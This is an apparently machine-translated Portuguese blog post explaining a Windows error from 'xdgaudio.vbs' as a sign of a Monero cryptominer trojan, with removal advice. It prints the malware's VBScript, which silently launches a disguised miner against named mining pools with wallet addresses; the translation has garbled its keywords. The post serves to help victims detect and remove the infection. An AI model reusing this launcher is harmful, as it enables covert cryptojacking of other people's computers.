Se você estiver recebendo a seguinte mensagem de erro relacionada a “xdgaudio.vbs” em seu sistema, é provável que seu computador esteja infectado.
Script: C: \ windows \ xdgaudio.vbs
Linha: 3
Car: 1
Erro: O sistema não pode encontrar o arquivo especificado.
Código: 80070002
Fonte: (nulo)
Quando editado com o Bloco de notas, o script pode conter linhas como a seguir:
Dim WShell. Defina WShell = CreateObject ("WScript. Concha") WShell. Execute "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum + tcp: //xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv. App -p x -k -o stratum + tcp: //mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSryBzaQ -p x ", 0. Definir WShell = Nada
Isso certamente se parece com um trojan CPU / criptomoeda Miner, que não apenas torna o seu computador lento, mas também pode representar uma ameaça à segurança. Os arquivos de script
c: \ windows \ xdgaudio.vbs e c: \ windows \ servicecrsssr.vbs deve ser excluído. Isto não é suficiente. Execute uma varredura completa usando o antimalware Malwarebytes e também faça uma varredura com o software antivírus que você está usando.Para obter instruções detalhadas sobre como remover esse Trojan Miner, consulte o guia malwaretips.com Como remover o cavalo de Tróia CPU Miner do Windows (Guia de Ajuda de Vírus).
Um pequeno pedido: Se você gostou deste post, por favor, compartilhe?
Um "pequeno" compartilhamento seu ajudaria seriamente no crescimento deste blog. Algumas ótimas sugestões:- Fixá-lo!
- Compartilhe com seu blog favorito + Facebook, Reddit
- Tweet isso!